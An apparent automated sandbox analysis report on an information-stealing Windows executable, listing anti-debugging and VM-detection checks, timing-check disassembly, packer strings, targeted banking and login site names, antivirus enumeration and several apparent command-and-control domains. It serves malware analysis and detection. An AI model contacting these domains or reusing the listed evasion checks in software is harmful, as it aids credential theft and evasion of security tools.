                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80632 second address: 4B8064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a call 00007F2A9129471Dh 0x0000000f mov edx, esi 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8069B second address: 4B806D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A913FCEA8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B806D6 second address: 4B806DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B806DA second address: 4B806E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B806E0 second address: 4B806F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A9129471Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B806F1 second address: 4B707D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2B022DADF2h 0x0000000e xor eax, eax 0x00000010 jmp 00007F2A913D65CAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007F2A913FCFD5h 0x0000002d call 00007F2A95579665h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov esi, ebx 0x00000037 call 00007F2A913FCEA7h 0x0000003c mov cx, AF7Fh 0x00000040 pop esi 0x00000041 popad 0x00000042 push ebx 0x00000043 jmp 00007F2A913FCEA0h 0x00000048 mov dword ptr [esp], ebp 0x0000004b pushad 0x0000004c mov ecx, 388C9ABDh 0x00000051 mov ebx, ecx 0x00000053 popad 0x00000054 mov ebp, esp 0x00000056 pushad 0x00000057 push ebx 0x00000058 mov cl, 2Fh 0x0000005a pop ebx 0x0000005b popad 0x0000005c xchg eax, ecx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov di, 99E0h 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B707D9 second address: 4B707FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, al 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B707FD second address: 4B7085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2A913FCE9Bh 0x00000013 jmp 00007F2A913FCEA3h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F2A913FCEA8h 0x0000001f sbb si, E418h 0x00000024 jmp 00007F2A913FCE9Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80A94 second address: 4B80B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A91294721h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F2A9129471Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F2A91294720h 0x0000001c cmp dword ptr [75AB459Ch], 05h 0x00000023 pushad 0x00000024 call 00007F2A9129471Eh 0x00000029 mov esi, 41F03621h 0x0000002e pop ecx 0x0000002f movsx edx, cx 0x00000032 popad 0x00000033 je 00007F2B02162619h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov cx, bx 0x0000003f jmp 00007F2A91294727h 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80BA3 second address: 4B80BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F2B022D1E5Ah 0x00000010 push 75A52B70h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov eax, dword ptr [esp+10h] 0x00000020 mov dword ptr [esp+10h], ebp 0x00000024 lea ebp, dword ptr [esp+10h] 0x00000028 sub esp, eax 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [75AB4538h] 0x00000032 xor dword ptr [ebp-04h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 mov dword ptr [ebp-18h], esp 0x0000003b push dword ptr [ebp-08h] 0x0000003e mov eax, dword ptr [ebp-04h] 0x00000041 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000048 mov dword ptr [ebp-08h], eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 ret 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F2A913FCE9Bh 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80BC0 second address: 4B80BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80BC5 second address: 4B80BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80BD9 second address: 4B80BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80C4C second address: 4B80C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90824 second address: 4B9082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9082A second address: 4B9087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F2A913FCEA2h 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c call 00007F2A913FCEA5h 0x00000021 mov si, 5257h 0x00000025 pop ecx 0x00000026 mov cl, bh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F2A913FCE9Bh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9087F second address: 4B908A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908A3 second address: 4B908A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908A7 second address: 4B908AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908AD second address: 4B908B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, AE17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908B6 second address: 4B908F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F2A91294723h 0x0000000d xchg eax, esi 0x0000000e jmp 00007F2A91294726h 0x00000013 mov esi, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2A9129471Ah 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908F9 second address: 4B908FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B908FF second address: 4B909CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A9129471Ch 0x00000009 adc si, AC48h 0x0000000e jmp 00007F2A9129471Bh 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c jmp 00007F2A9129471Bh 0x00000021 je 00007F2B0215219Ah 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F2A91294724h 0x0000002e or al, FFFFFFD8h 0x00000031 jmp 00007F2A9129471Bh 0x00000036 popfd 0x00000037 jmp 00007F2A91294728h 0x0000003c popad 0x0000003d cmp dword ptr [75AB459Ch], 05h 0x00000044 jmp 00007F2A91294720h 0x00000049 je 00007F2B0216A21Fh 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F2A9129471Eh 0x00000056 add ah, FFFFFF98h 0x00000059 jmp 00007F2A9129471Bh 0x0000005e popfd 0x0000005f mov ch, 04h 0x00000061 popad 0x00000062 push ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 call 00007F2A9129471Dh 0x0000006b pop eax 0x0000006c mov ebx, 37F974A4h 0x00000071 popad 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90AE4 second address: 4B90AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSpecial instruction interceptor: First address: A18D6E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSpecial instruction interceptor: First address: A18E3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSpecial instruction interceptor: First address: BBDE4D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSpecial instruction interceptor: First address: A161C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSpecial instruction interceptor: First address: C50C42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe TID: 4220Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe TID: 7380Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeLast function: Thread delayed
                Source: Amcache.hve.11.drBinary or memory string: VMware
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.11.drBinary or memory string: vmci.sys
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.11.drBinary or memory string: VMware20,1
                Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: tTGxYWtjG5.exe, 00000001.00000002.1911580462.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383492932.00000000054F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: tTGxYWtjG5.exe, 00000001.00000002.1911580462.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: tTGxYWtjG5.exe, 00000001.00000003.1383654052.00000000054E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: SICE
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: tTGxYWtjG5.exe, 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: observerfry.lat
                Source: tTGxYWtjG5.exe, 00000001.00000002.1911805771.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
